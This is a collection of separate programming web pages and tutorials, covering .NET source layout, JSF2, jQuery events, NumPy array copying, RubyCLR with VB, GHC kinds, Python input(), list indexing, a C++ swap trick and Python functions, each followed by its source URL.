As we got close to the end game for V1, we broke this pattern in the framework tree when we refactored types into several different assemblies and merged some other assemblies into one (mostly for performance reasons). There are a few assemblies, such as System.dll, that now pull in code from ~6 different directories scattered throughout the tree. It takes a lot more effort (or memorization) to find the source for types that live in System.dll. Our dev team is not crazy about that, as it increases the time to find the source for types... mostly they give up and type "dir /s". At least we generally keep to one class per file, so "dir /s" is usually successful.
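The convention is simple enough to capture as a path rule: assembly root, then one directory per namespace segment, then one .cs file per type. The helper below is a hypothetical illustration of that mapping (my own sketch, not any actual Microsoft tooling):

```python
def source_path(assembly, full_type_name):
    """Map a fully qualified type name to its conventional source file."""
    namespace, _, type_name = full_type_name.rpartition(".")
    parts = [assembly] + (namespace.split(".") if namespace else []) + [type_name + ".cs"]
    return "\\".join(parts)

print(source_path("MSCorLib", "System.String"))         # → MSCorLib\System\String.cs
print(source_path("MSCorLib", "System.IO.FileStream"))  # → MSCorLib\System\IO\FileStream.cs
```

The appeal of the rule is exactly that it is mechanical: given only a type's full name, you know where its source lives without searching.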
http://blogs.msdn.com/b/brada/archive/2004/06/12/154406.aspx
Facelets vs. JSF2 & EzComp

Several things that make life painful with Facelets are fixed with JSF2 & EzComp. Take a look at some of the nicer things to come:

- You can pass a value-binding into a component.
- You can assign a listener to a specific input field/button inside a custom component.
- You can pass facets into components and use them conditionally.
- You can attach validators to specific input fields/buttons of components.
- You can pass nested children into components and use them conditionally.
- In EzComp, namespaces are created automatically by convention - no more taglibs.
- You can include CSS or JS files from packaged jars - a big issue when using shared libraries of components.
- Standard support for Ajax - no javascript required (<f:ajax />).

Without all of this, with JSP or Facelets 1.2, you eventually need to write components in Java, which means a lot of time-consuming work. Having gone down that road, and then experienced EzComp, I've seen a time-saving of about 10x, with a lot more power to create really interactive and rich components through Ajax. Instead of the 3-4 files required to make a component, you now have 1: the component itself.

Moral of the Story: If you are considering an upgrade from JSP, go right to JSF2; it's stable enough to begin development.

Also, be sure to check out the developer blogs for more updates on JSF2:

Comments:

This is great news! I hope JSF 2.0 will come soon and, more important, that application servers and web containers will be able to deploy its applications without extra configuration!

Amr Gawish, Mojarra 2.0 Beta was just released. It should be extremely stable, certainly enough to begin development work on it. Mojarra 2 has been in the GlassFish v3 trunk for quite some time, and we have no major issues that I'm aware of.

Furthermore, Mojarra 2 is available for GF v2 which, although it may not be your container, shows that it runs quite nicely in a Java EE 5 environment; so Tomcat 6 (and perhaps 5), JBoss 5, etc. should run Mojarra/JSF 2 very nicely. If you do run into issues, please file an issue on our tracker.

Thanks, and have fun. 🙂

Jason Lee

I can confirm that JSF 2.0 applications do deploy/run on Tomcat 6.0.20 out of the box.

HTH,
Eric G.
https://www.ocpsoft.org/java/jsf-java/facelets-vs-jsf2-ezcomp/
Not Limited To a Single ready() Event

It is important to keep in mind that you can declare as many custom ready() events as you would like. You are not limited to attaching a single .ready() event to the document. The ready() events are executed in the order that they are included.

Notes: Passing the jQuery function a function - e.g. jQuery(function(){ /* code here */ }) - is a shortcut for jQuery(document).ready().

Attaching/Removing Events Using bind() and unbind()

Using the bind() method - e.g. jQuery('a').bind('click', function(){}) - you can add any of the following standard handlers to the appropriate DOM elements:

blur, focus, load, resize, scroll, unload, beforeunload, click, dblclick, mousedown, mouseup, mousemove, mouseover, mouseout, change, submit, keydown, keypress, keyup, error

Obviously, based on DOM standards, only certain handlers coincide with particular elements. In addition to this list of standard handlers, you can also leverage bind() to attach jQuery custom handlers - e.g. mouseenter and mouseleave - as well as any custom handlers you may create.

To remove standard or custom handlers, we simply pass the unbind() method the handler name or custom handler name that needs to be removed - e.g. jQuery('a').unbind('click'). If no parameters are passed to unbind(), it will remove all handlers attached to an element.

The concepts just discussed are expressed in the code example below.
```html
<!DOCTYPE html>
<html lang="en">
<body>
  <input type="text" value="click me">
  <br>
  <br>
  <button>remove events</button>
  <div id="log" name="log"></div>
  <script src=""></script>
  <script>
    (function ($) {
      // Bind events
      $('input').bind('click', function () {
        alert('You clicked me!');
      });
      $('input').bind('focus', function () {
        // alert and focus events are a recipe for an endless list of dialogs
        // we will log instead
        $('#log').html('You focused this input!');
      });
      // Unbind events
      $('button').click(function () {
        // Using shortcut binding via click()
        $('input').unbind('click');
        $('input').unbind('focus');
        // Or, unbind all events
        // $('button').unbind();
      });
    })(jQuery);
  </script>
</body>
</html>
```

Notes:
- jQuery provides several shortcuts to the bind() method for use with all standard DOM events, which excludes custom jQuery events like mouseenter and mouseleave. Using these shortcuts simply involves substituting the event's name as the method name - e.g. .click(), mouseout(), focus().
- You can attach unlimited handlers to a single DOM element using jQuery.
- jQuery provides the one() event handling method to conveniently bind an event to DOM elements that will be executed once and then removed. The one() method is just a wrapper for bind() and unbind().

Programmatically Invoke a Specific Handler Via Short Event Methods

The shortcut syntax - e.g. .click(), mouseout(), and focus() - for binding an event handler to a DOM element can also be used to invoke handlers programmatically. To do this, simply use the shortcut event method without passing it a function. In theory, this means that we can bind a handler to a DOM element and then immediately invoke that handler. Below, I demonstrate this via the click() event.
```html
<!DOCTYPE html>
<html lang="en">
<body>
  <a>Say Hi</a> <!-- clicking this element will alert "hi" -->
  <a>Say Hi</a> <!-- clicking this element will alert "hi" -->
  <script src=""></script>
  <script>
    (function ($) {
      // Bind a click handler to all <a> and immediately invoke their handlers
      $('a').click(function () {
        alert('hi')
      }).click();
      // Page will alert twice. On page load, a click
      // is triggered for each <a> in the wrapper set.
    })(jQuery);
  </script>
</body>
</html>
```

Notes:
- It is also possible to use the event trigger() method to invoke specific handlers - e.g. jQuery('a').click(function(){ alert('hi') }).trigger('click'). This will also work with namespaced and custom events.

jQuery Normalizes the Event Object

jQuery normalizes the event object according to W3C standards. This means that when the event object is passed to a function handler, you do not have to worry about browser-specific implementations of the event object (e.g. Internet Explorer's window.event). You can use the following attributes and methods of the event object worry-free from browser differences, because jQuery normalizes the event object.

Event object attributes: event.type, event.target, event.data, event.relatedTarget, event.currentTarget, event.pageX, event.pageY, event.result, event.timeStamp

Event object methods: event.preventDefault(), event.isDefaultPrevented(), event.stopPropagation(), event.isPropagationStopped(), event.stopImmediatePropagation(), event.isImmediatePropagationStopped()

To access the normalized jQuery event object, simply pass the anonymous function, passed to a jQuery event method, a parameter named "event" (or whatever you want to call it). Then, inside of the anonymous callback function, use the parameter to access the event object. Below is a coded example of this concept.
```html
<!DOCTYPE html>
<html lang="en">
<body>
  <script src=""></script>
  <script>
    (function ($) {
      $(window).load(function (event) {
        alert(event.type);
      }); // Alerts "load"
    })(jQuery);
  </script>
</body>
</html>
```

Grokking Event Namespacing

Often we will have an object in the DOM that needs to have several functions tied to a single event handler. For example, let's take the resize handler. Using jQuery, we can add as many functions to the window.resize handler as we like. But what happens when we need to remove only one of these functions but not all of them? If we use $(window).unbind('resize'), all functions attached to the window.resize handler will be removed. By namespacing a handler (e.g. resize.unique), we can assign a unique hook to a specific function for removal.

```html
<!DOCTYPE html>
<html lang="en">
<body>
  <script src=""></script>
  <script>
    (function ($) {
      $(window).bind('resize', function () {
        alert('I have no namespace');
      });
      $(window).bind('resize.unique', function () {
        alert('I have a unique namespace');
      });
      // Removes only the resize.unique function from the event handler
      $(window).unbind('resize.unique');
    })(jQuery);
  </script>
</body>
</html>
```

In the above code, we add two functions to the resize handler. The second (in document order) resize event added uses event namespacing and then immediately removes this event using unbind(). I did this to make the point that the first function attached is not removed. Namespacing events gives us the ability to label and remove unique functions assigned to the same handler on a single DOM element.

In addition to unbinding a specific function associated with a single DOM element and handler, we can also use event namespacing to exclusively invoke (using trigger()) a specific handler and function attached to a DOM element. In the code below, two click events are added to <a>, and then, using namespacing, only one is invoked.
```html
<!DOCTYPE html>
<html lang="en">
<body>
  <a>click</a>
  <script src=""></script>
  <script>
    (function ($) {
      $('a').bind('click', function () {
        alert('You clicked me')
      });
      $('a').bind('click.unique', function () {
        alert('You Trigger click.unique')
      });
      // Invoke the function passed to click.unique
      $('a').trigger('click.unique');
    })(jQuery);
  </script>
</body>
</html>
```

Notes:
- There is no limit to the depth or number of namespaces used - e.g. resize.layout.headerFooterContent.
- Namespacing is a great way of protecting, invoking, and removing any exclusive handlers that a plugin may require.
- Namespacing works with custom events as well as standard events - e.g. click.unique or myclick.unique.

Grokking Event Delegation

Event delegation relies on event propagation (a.k.a. bubbling). When you click an <a> inside of a <li>, which is inside of a <ul>, the click event bubbles up the DOM from the <a> to the <li> to the <ul> and so on, until each ancestor element with a function assigned to an event handler fires. This means that if we attach a click event to a <ul> and then click an <a> that is encapsulated inside of the <ul>, the click handler attached to the <ul>, because of bubbling, will eventually be invoked. When it is invoked, we can use the event object (event.target) to identify which element in the DOM actually caused the event bubbling to begin. Again, this will give us a reference to the element that started the bubbling. By doing this, we can seemingly add an event handler to a great number of DOM elements using only a single event handler/declaration. This is extremely useful; for example, a table with 500 rows where each row requires a click event can take advantage of event delegation. Examine the code below for clarification.
<!DOCTYPE html> <html lang="en"> <body> <ul> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> <li><a href="#">remove</a></li> </ul> <script src=""></script> <script> (function ($) { $('ul').click(function (event) { // Attach click handler to <ul> and pass event object // event.target is the <a> $(event.target).parent().remove(); // Remove <li> using parent() return false; // Cancel default browser behavior, stop propagation }); })(jQuery); </script> </body> </html> Now, if you were to literally click on one of the actual bullets of the list and not the link itself, guess what? You'll end up removing the <ul>. Why? Because all clicks bubble. So when you click on the bullet, the event.target is the <li>, not the <a>. Since this is the case, the parent() method will grab the <ul> and remove it. We could update our code so that we only remove an <li> when it is being clicked from an <a> by passing the parent() method an element expression. $(event.target).parent('li').remove(); The important point here is that you have to manage carefully what is being clicked when the clickable area contains multiple encapsulated elements due to the fact that you never know exactly where the user may click. Because of this, you have to check to make sure the click occurred from the element you expected it to. Applying Event Handlers to DOM Elements Regardless of DOM Updates Using live() Using the handy live() event method, you can bind handlers to DOM elements currently in a Web page and those that have yet to be added. The live() method uses event delegation to make sure that newly added/created DOM elements will always respond to event handlers regardless of DOM manipulations or dynamic changes to the DOM. Using live() is essentially a shortcut for manually having to set up event delegation. 
For example, using live() we could create a button that creates another button indefinitely. <!DOCTYPE html> <html lang="en"> <body> <button>Add another button</button> <script src=""></script> <script> (function ($) { $('button').live('click', function () { $(this).after("<button>Add another button</button>"); }); })(jQuery); </script> </body> </html> After examining the code, it should be obvious that we are using live() to apply event delegation to a parent element ( <body> element in the code example) so that any button element added to the DOM always responds to the click handler. To remove the live event, we simply use the die() method-e.g. $('button').die(). The concept to take away is the live() method could be used to attach events to DOM elements that are removed and added using AJAX. In this way, you would forgo having to rebind events to new elements introduced into the DOM after the initial page load. Notes: live() supports the following handlers: click, dblclick, mousedown, mouseup, mousemove, mouseover, mouseout, keydown, keypress, keyup. live() only works against a selector. live() by default will stop propagation by using return false within the function sent to the live() method. Adding a Function to Several Event Handlers It is possible to pass the event bind() method several event handlers. This makes it possible to attach the same function, written once, to many handlers. In the code example below, we attach a single anonymous callback function to the click, keypress, and resize event handlers on the document. 
<!DOCTYPE html> <html lang="en"> <body> <script src=""></script> <script> (function ($) { // Responds to multiple events $(document).bind('click keypress resize', function (event) { alert('A click, keypress, or resize event occurred on the document.'); }); })(jQuery); </script> </body> </html> Cancel Default Browser Behavior With preventDefault() When a link is clicked or a form is submitted, the browser will invoke its default functionality associated with these events. For example, click an <a> link and the Web browser will attempt to load the value of the <a> href attribute in the current browser window. To stop the browser from performing this type of functionality, you can use the preventDefault() method of the jQuery normalized event object. <!DOCTYPE html> <html lang="en"> <body> <a href="">jQuery</a> <script src=""></script> <script> (function ($) { // Stops browser from navigating $('a').click(function (event) { event.preventDefault(); }); })(jQuery); </script> </body> </html> Cancel Event Propagation With stopPropagation() Events propagate (a.k.a. bubble) up the DOM. When an event handler is fired for any given element, the invoked event handler is also invoked for all ancestor elements. This default behavior facilitates solutions like event delegation. To prohibit this default bubbling, you can use the jQuery normalized event method stopPropagation(). 
<!DOCTYPE html> <html lang="en"> <body> <div><span>stop</span></div> <script src=""></script> <script> (function ($) { $('div').click(function (event) { // Attach click handler to <div> alert('You clicked the outer div'); }); $('span').click(function (event) { // Attach click handler to <span> alert('You clicked a span inside of a div element'); // Stop click on <span> from propagating to <div> // If you comment out the line below, //the click event attached to the div will also be invoked event.stopPropagation(); }); })(jQuery); </script> </body> </html> In the code example above, the event handler attached to the <div> element will not be triggered. Cancelling Default Behavior and Event Propagation Via return false Returning false - e.g. return false - is the equivalent of using both preventDefault() and stopPropagation(). <!DOCTYPE html> <html lang="en"> <body><span><a href="javascript:alert('You clicked me!')" class="link">click me</a></span> <script src=""></script> <script> (function($){ $('span').click(function(){ // Add click event to <span> window.location=''; }); $('a').click(function(){ // Ignore clicks on <a> return false; }); })(jQuery); </script> </body> </html> If you were to comment out the return false statement in the code above, alert() would get invoked because by default the browser will execute the value of the href. Also, the page would navigate to jQuery.com due to event bubbling. Create Custom Events and Trigger Them Via trigger() With jQuery, you have the ability to manufacture your own custom events using the bind() method. This is done by providing the bind() method with a unique name for a custom event. Now, because these events are custom and not known to the browser, the only way to invoke custom events is to programmatically trigger them using the jQuery trigger() method. Examine the code below for an example of a custom event that is invoked using trigger(). 
<!DOCTYPE html> <html lang="en"> <body> <div>jQuery</div> <script src=""></script> <script> (function ($) { $('div').bind('myCustomEvent', function () { // Bind a custom event to <div> window.location = ''; }); $('div').click(function () { // Click the <div> to invoke the custom event $(this).trigger('myCustomEvent'); }) })(jQuery); </script> </body> </html> Cloning Events As Well As DOM Elements By default, cloning DOM structures using the clone() method does not additionally clone the events attached to the DOM elements being cloned. In order to clone the elements and the events attached to the elements you must pass the clone() method a Boolean value of true. <!DOCTYPE html> <html lang="en"> <body> <button>Add another button</button> <a href="#" class="clone">Add another link</a> <script src=""></script> <script> (function ($) { $('button').click(function () { var $this = $(this); $this.clone(true).insertAfter(this); // Clone element and its events $this.text('button').unbind('click'); // Change text, remove event }); $('.clone').click(function () { var $this = $(this); $this.clone().insertAfter(this); // Clone element, but not its events $this.text('link').unbind('click'); // Change text, remove event }); })(jQuery); </script> </body> </html> Getting X and Y Coordinates of the Mouse in the Viewport By attaching a mousemove event to the entire page (document), you can retrieve the X and Y coordinates of the mouse pointer as it moves around inside in the viewport over the canvas. This is done by retrieving the pageY and pageX properties of the jQuery normalized event object. 
<!DOCTYPE html> <html lang="en"> <body> <script src=""></script> <script> (function ($) { $(document).mousemove(function (e) { // e.pageX - gives you the X position // e.pageY - gives you the Y position $('body').html('e.pageX = ' + e.pageX + ', e.pageY = ' + e.pageY); }); })(jQuery); </script> </body> </html>

Getting X and Y Coordinates of the Mouse Relative to Another Element

It is often necessary to get the X and Y coordinates of the mouse pointer relative to an element other than the viewport or entire document. This is usually done with ToolTips, where the ToolTip is shown relative to the location that the mouse is hovering. This can easily be accomplished by subtracting the offset of the relative element from the viewport's X and Y mouse coordinates.

<!DOCTYPE html> <html lang="en"> <body> <!-- Move mouse over div to get position relative to the div --> <div style="margin: 200px; height: 100px; width: 100px; background: #ccc; padding: 20px"> relative to this </div> <script src=""></script> <script> (function($){ $('div').mousemove(function(e){ // relative to this div element instead of document var relativeX = e.pageX - this.offsetLeft; var relativeY = e.pageY - this.offsetTop; $(this).html('relativeX = ' + relativeX + ', relativeY = ' + relativeY); }); })(jQuery); </script> </body> </html>
https://code.tutsplus.com/tutorials/jquery-succinctly-events-jquery--net-33837
Create array from another array in Python (Copy array elements)

In this tutorial, you will learn how to create an array from another (existing) array in Python. In simpler words, you will learn to copy the array elements into another array. You must be familiar with what an array is and its uses. To recap, an array is a data structure that stores multiple elements (values) in a single variable.

Using the Python NumPy library's copy() method

Syntax: array2=array1.copy()

On execution, the above statement returns a new array - array2, which contains exactly the same elements as array1. Here, array1 is the n-dimensional array to be copied. array2 is the new array to be created to contain elements of array1. The same is shown below:

import numpy as np
array1=np.array([1,2,3])
print("array 1",array1)
array2=array1.copy()
print("array 2",array2)

array 1 [1 2 3]
array 2 [1 2 3]

It is important to note that first, we are creating a new array instance. Then, we are copying the contents of the original array into the new one. Thus, any changes you later make to the first array will not be reflected in the copied array.

import numpy as np
array1=np.array([1,2,3])
array2=array1.copy()
array1[1]=7
print("array 1",array1)
print("array 2",array2)

array 1 [1 7 3]
array 2 [1 2 3]

Well, what happens if you use the assignment operator (=) to copy the array elements? It does not actually copy the elements at all; it makes both names refer to the same array object. So, any changes made to array1 will automatically be reflected in array2, as shown.

import numpy as np
array1=np.array([1,2,3])
array2=array1
array1[1]=7
print("array 1",array1)
print("array 2",array2)

array 1 [1 7 3]
array 2 [1 7 3]

In better words, you are not creating a new object, but in fact creating a reference to the original object.
For better understanding, observe the code below:

import numpy as np
array1=np.array([1,2,3])
array2=array1
array1[1]=7
print(id(array1))
print("array 1",array1)
print(id(array2))
print("array 2",array2)

1924624603936
array 1 [1 7 3]
1924624603936
array 2 [1 7 3]

As you may have observed, when you were using the copy() method, you were creating a new array object and not just a reference instance for the original object.

Copying the array elements into a new array by looping through in Python

- Create a new array with the same length as that of the one to be copied.
- Loop through the two arrays, copying the elements from the first and assigning them to the second, respectively.

Note: Even in this case, you are copying the elements into another array. So, any changes made to array1 will not be reflected in array2.

import numpy as np
array1=np.array([1,2,3])
print("array 1",array1)
array2=[None]*len(array1)
for i in range(0,len(array1)):
    array2[i]=array1[i]
print("array 2",array2)

array 1 [1 2 3]
array 2 [1, 2, 3]

To learn more about Python arrays, see the Python Array Module.
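One caveat the tutorial does not cover: both copy() and the element-by-element loop make shallow copies. For nested Python lists (or NumPy arrays of Python objects), the inner containers are still shared between the two arrays; the standard library's copy.deepcopy copies those as well. A short sketch using plain Python lists:

```python
import copy

list1 = [[1, 2], [3, 4]]
shallow = list(list1)        # new outer list, but the inner lists are shared
deep = copy.deepcopy(list1)  # fully independent copy, inner lists included

list1[0][0] = 99
print(shallow[0][0])  # 99 - the shared inner list reflects the change
print(deep[0][0])     # 1  - the deep copy is unaffected
```

For flat arrays of numbers, as in the examples above, copy() is all you need; deepcopy only matters once the elements are themselves mutable containers.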
https://www.codespeedy.com/create-array-from-another-array-in-python-copy-array-elements/
Visual Basic

Over the last week I've had a chance to play around with RubyCLR (John Lam is the brains behind it - what an awesome project!). I thought that I would post some thoughts around it and some "tutorial" like articles, since the documentation was a bit scarce and it took me a while to figure out certain things that I hope will help you in your quest to connect Ruby with CLR objects. I'll be working with Visual Basic since I think there are some really cool things in VB that should make it easier to work with Ruby classes, but John hasn't implemented them yet; I will have a separate post with some requests to follow. I will assume that you have downloaded RubyCLR and Ruby itself, and followed the instructions to get it to work. I was able to get it to work by using Ruby 1.8.4 and the 1.8.4 sources. I've also included a zip file with the VB sources and the ruby source. The application that we are going to build (trivial application, just to demonstrate how things work) will have the ruby script call a method in a class in VB. Then, the ruby script will create an instance of its own class, pass it to VB, and have VB call a method on it.

Calling a VB function

This first part is pretty trivial. The following code is the VB method we will call:

Public Sub DoAction( x as String, i as Integer )
    Console.WriteLine( "You gave me a string {0} and an integer {1}", x, i )
End Sub

In Ruby, we simply do the following:

vbclass = Sample::Sample.new
vbclass.DoAction( "tim", 10 )

Getting VB to call a method in a Ruby class

This part was more challenging. I had to dig through a bunch of stuff in order to figure it out. The current implementation of RubyCLR only exposes Ruby methods that match an interface declared in .NET. This is one of the things I will ask John about in my next post. Here's the .NET interface I compiled with my VB assembly:

Public Interface IRubyCallable
    sub Go()
    sub Go2(x)
End Interface

Here's the Ruby class. I will comment on it below.
class RubyClass
  include RubyClr::Bindable

  def clr_interfaces
    ['Sample.IRubyCallable']
  end

  def get_binding_context
    ['X']
  end

  def X
  end

  def go
    puts 'We are go!'
  end

  def go2( x )
    print 'We are go with x = ', x
  end
end

First of all, you need to include the RubyClr::Bindable mixin. This will cause RubyCLR to consider this class for .NET bridging. You need a method called "clr_interfaces" which returns an array of qualified interface names that this class implements. RubyCLR will expose the methods on these interfaces to the .NET object. You need a method called "get_binding_context" which returns an array of property names in the current class. The current implementation of RubyCLR requires this even if you don't want a property exposed; I just put a dummy property name. Finally, you implement the two interface methods. Here's the VB code to consume:

Public Sub CallRuby( x as Object )
    Console.WriteLine( "Try to call a method on object..." )
    x.Go()
    x.Go2( 10 )
End Sub

Notice that I'm using the late binding feature in VB, rather than typing to the interface. This is one thing that I think John can do to make the VB experience better: exposing all methods in any Bindable Ruby class, and letting the VB late binder resolve method calls at runtime. I will post more on these thoughts later. Now, if you run the Ruby script, you should see the two statements outputted to your console. It took me way too long to get this working, so I hope that this will help you on your way to Ruby+VB+C# bliss.
http://blogs.msdn.com/timng/archive/2006/08/19/708049.aspx
Defining kinds without an associated datatype

The ticket tracking this request is #6024.

We cannot use kinds (such as *) while defining a datatype, so we are forced to make Universe a datatype, as above, even though Sum, Prod, and K are then also constructors of Universe.

Solution: let users define things like

data kind Universe = Sum Universe Universe | Prod Universe Universe | K *

By using data kind, we tell GHC that we are only interested in the Universe kind, and not the datatype. Consequently, Sum, Prod, and K will be types only, and not constructors. Also, data type D = C defines a datatype D which is not promoted to a kind, and its constructor C is not promoted to a type.

Caveats

Star in Star

If, in the future, we make * :: *, we will no longer have separation of types and kinds, so we won't be able to make such fine distinctions.

Recursive Groups

Kind and Type Namespaces

As kinds and types currently share a namespace, data kind and data type declarations in the same module can still conflict. However, if they are in separate modules, this can be controlled by use of the module system.

Alternative Solutions

Add data Star in GHC.Exts such that the promotion of datatype Star is the kind *. As a datatype, Star is just an empty datatype.

Advantages: very easy, backwards compatible
Disadvantages: somewhat verbose, doesn't fix (2)

Alternative Notations

- Use data only instead of data type.
- Use 'data instead of data kind, suggested by Gabor Greif.

In both cases, we felt that using type and kind as the modifiers to the data declaration better reflects what's being defined.
https://ghc.haskell.org/trac/ghc/wiki/GhcKinds/KindsWithoutData?version=15
The input() implementation is a bit like this: def input(prompt): if stdin and stdout are the original file descriptors, and are terminals: return PyOS_Readline(sys.stdin, sys.stdout, prompt) else: sys.stdout.write(prompt) # Writes to stdout return sys.stdin.readline() def PyOS_StdioReadline(stdin, stdout, prompt): '''Default implementation of PyOS_Readline()''' sys.stderr.write(prompt) # Writes to stderr return stdin.readline() def call_readline(stdin, stdout, prompt): '''Implementation of PyOS_Readline() in the "readline" module''' rl_instream = stdin rl_outstream = stdout # Readline writes to stdout return readline_until_enter_or_signal(prompt) It looks like PyOS_StdioReadline() has always written to stderr. The stdin and stdout parameters of PyOS_Readline() were added later, in revision dc4a0336a2a3. I think the changes to myreadline.c will also affect the interactive interpreter prompt. But we have Issue 12869 open to change that to stdout, so maybe the change is okay. Since input() should no longer depend on any instance of stderr, perhaps the check for “lost sys.stderr” should also be removed. It may be worth applying any changes in myreadline.c to the independent version in pgenmain.c as well, just for consistency.
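The "stdin and stdout are terminals" condition in the pseudocode above can be probed from Python with isatty(). A hypothetical sketch of the non-terminal fallback branch (the PyOS_Readline path is in C and not reproducible here), exercised with in-memory streams:

```python
import io

def fallback_input(prompt, stdin, stdout):
    """Mimic input()'s non-terminal branch: write prompt to stdout, read from stdin.

    This models the pseudocode above; the names are illustrative, not CPython's.
    """
    stdout.write(prompt)                 # this branch prompts on stdout, not stderr
    return stdin.readline().rstrip("\n")

fake_in = io.StringIO("hello\n")
fake_out = io.StringIO()
result = fallback_input("? ", fake_in, fake_out)
print(result)               # hello
print(fake_out.getvalue())  # ? 
```

With real terminals you would instead check sys.stdin.isatty() and sys.stdout.isatty() to decide which branch applies.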
https://bugs.python.org/msg255080
Question This exercise asks to print a particular index of a list. Can list elements be accessed in any order? Answer Yes, list elements can be accessed in any order so long as the index used is valid. Valid indexes for a list are values from 0 through len() - 1 of the list. The following example shows a list whose items are randomly accessed using the randint() function. As long as the value returned by randint() is between 0 and len() -1 for the list, there is no issue accessing the list items. If the index used is greater than len() -1 for the list, then an IndexError will occur. The exception to this is the use of a negative index. A negative index will return an element from the end of the list without needing to know how many items are in the list. from random import randint elements = ['Hydrogen', 'Helium', 'Carbon', 'Oxygen', 'Nitrogen'] for count in range(10): index = randint(0, len(elements) - 1) print(elements[index])
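As a complement to the randint() example, negative indexes read from the end of the list without needing len() at all, while an index of len() or more raises the IndexError mentioned above. A short sketch, reusing the same list:

```python
elements = ['Hydrogen', 'Helium', 'Carbon', 'Oxygen', 'Nitrogen']

# Negative indexes count back from the end of the list
print(elements[-1])  # Nitrogen
print(elements[-2])  # Oxygen

# An index >= len(elements) is out of range
try:
    elements[len(elements)]
except IndexError:
    print("IndexError")
```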
https://discuss.codecademy.com/t/can-items-of-a-list-be-accessed-in-any-order/349665
C++ FAQ - How to swap the two numbers without using temporary variable?

It is easy to swap two numbers using a temporary variable.

double a = 22.66;
double b = 55.62;
double t = 0;
t = a;
a = b;
b = t;

How about swapping the numbers without using a temporary variable? Look at the sample code given below:

Source Code

#include <stdio.h>
#include <iostream>
#include <tchar.h>

int _tmain(int argc, _TCHAR* argv[])
{
    // Swap the two numbers without using temporary variables
    double a = 22.66;
    double b = 55.62;
    std::cout << "Step1: " << a << "\t" << b << "\n";
    a = a + b; // Get the sum of the two numbers and assign it to a
    std::cout << "Step2: " << a << "\t" << b << "\n";
    b = a - b; // a (sum) - b gives you the original value of a; assign it to b
    std::cout << "Step3: " << a << "\t" << b << "\n";
    a = a - b; // a (sum) - b (now holding the original value of a) gives you b; assign it to a
    std::cout << "Step4: " << a << "\t" << b << "\n";
    return 0;
}

Output

Step1: 22.66 55.62
Step2: 78.28 55.62
Step3: 78.28 22.66
Step4: 55.62 22.66
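The same arithmetic trick carries over to other languages, with a caveat the FAQ does not mention: for floating-point values, a + b may round, so the restored values are not guaranteed to be bit-exact; for integers it is exact. A sketch in Python, also showing tuple unpacking, which swaps without either arithmetic or a named temporary:

```python
# Arithmetic swap - exact for integers, may round for floats
a, b = 22, 55
a = a + b  # a holds the sum
b = a - b  # b now holds the original a
a = a - b  # a now holds the original b
print(a, b)  # 55 22

# Idiomatic Python swap via tuple unpacking - no visible temporary, no rounding
x, y = 22.66, 55.62
x, y = y, x
print(x, y)  # 55.62 22.66
```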
http://www.softwareandfinance.com/CSharp/FAQ_Swap_Numbers.html
6.5. Functions can Call Other Functions

It is important to understand that each of the functions we write can be used and called from other functions we write. This is one of the most important ways that computer scientists take a large problem and break it down into a group of smaller problems. This process of breaking a problem into smaller subproblems is called functional decomposition.

Here's a simple example of functional decomposition using two functions. The first function, called square, simply computes the square of a given number. The second function, called sum_of_squares, makes use of square to compute the sum of three numbers that have been squared.

Even though this is a pretty simple idea, in practice this example illustrates many very important Python concepts, including local and global variables along with parameter passing. Note that when you step through this example, codelens bolds line 1 and line 5 as the functions are defined. The body of square is not executed until it is called from the sum_of_squares function for the first time on line 6. Also notice that when square is called there are two groups of local variables, one for square and one for sum_of_squares. As you step through you will notice that x and y are local variables in both functions and may even have different values. This illustrates that even though they are named the same, they are, in fact, very different.

Now we will look at another example that uses two functions. So we eventually come up with this rather nice code that can draw a rectangle.

def drawRectangle(t, w, h):
    """Get turtle t to draw a rectangle of width w and height h."""
    for i in range(2):
        t.forward(w)
        t.left(90)
        t.forward(h)
        t.left(90)

The parameter names are deliberately chosen as single letters to ensure they're not misunderstood. In real programs, once you've had more experience, we will insist on better variable names than this.
The point is that the program doesn't "understand" that you're drawing a rectangle or that the parameters represent the width and the height. Concepts like rectangle, width, and height are meaningful for humans. They are not concepts that the program or the computer understands.

Thinking like a computer.

def drawSquare(tx, sz):   # a new version of drawSquare
    drawRectangle(tx, sz, sz)

Here is the entire example with the necessary set up code. There are some points worth noting here:

- Functions can call other functions.
- Rewriting drawSquare like this captures the relationship that we've spotted.
- A caller of this function might say drawSquare(tess, 50). The parameters of this function, tx and sz, are assigned the values of the tess object, and the integer 50, respectively.
- In the body of the function, tx and sz are just like any other variables.
- When the call is made to drawRectangle, the values in variables tx and sz are fetched first, then the call happens. So as we enter the top of function drawRectangle, its variable t is assigned the tess object, and w and h in that function are both given the value 50.
- The function (including its name) can capture your mental chunking, or abstraction, of the problem.
- Creating a new function can make a program smaller by eliminating repetitive code.
- Sometimes you can write functions that allow you to solve a specific problem using a more general solution.

Lab - Drawing a Circle

In this guided lab exercise we will work through a simple problem solving exercise related to drawing a circle with the turtle.
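The square/sum_of_squares example discussed at the start of this section appears in the original as an interactive codelens widget rather than printed code. A sketch consistent with the description above (square defined on line 1, sum_of_squares on line 5, and the first call to square on line 6, with x and y local to both functions) might be:

```python
def square(x):
    y = x * x
    return y

def sum_of_squares(x, y, z):
    a = square(x)   # square's body runs for the first time here
    b = square(y)
    c = square(z)
    return a + b + c

print(sum_of_squares(1, 2, 3))  # 14
```

Stepping through this, x and y exist separately in each function's local frame, which is the point the text makes about same-named but distinct variables.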
http://interactivepython.org/runestone/static/thinkcspy/Functions/Functionscancallotherfunctions.html
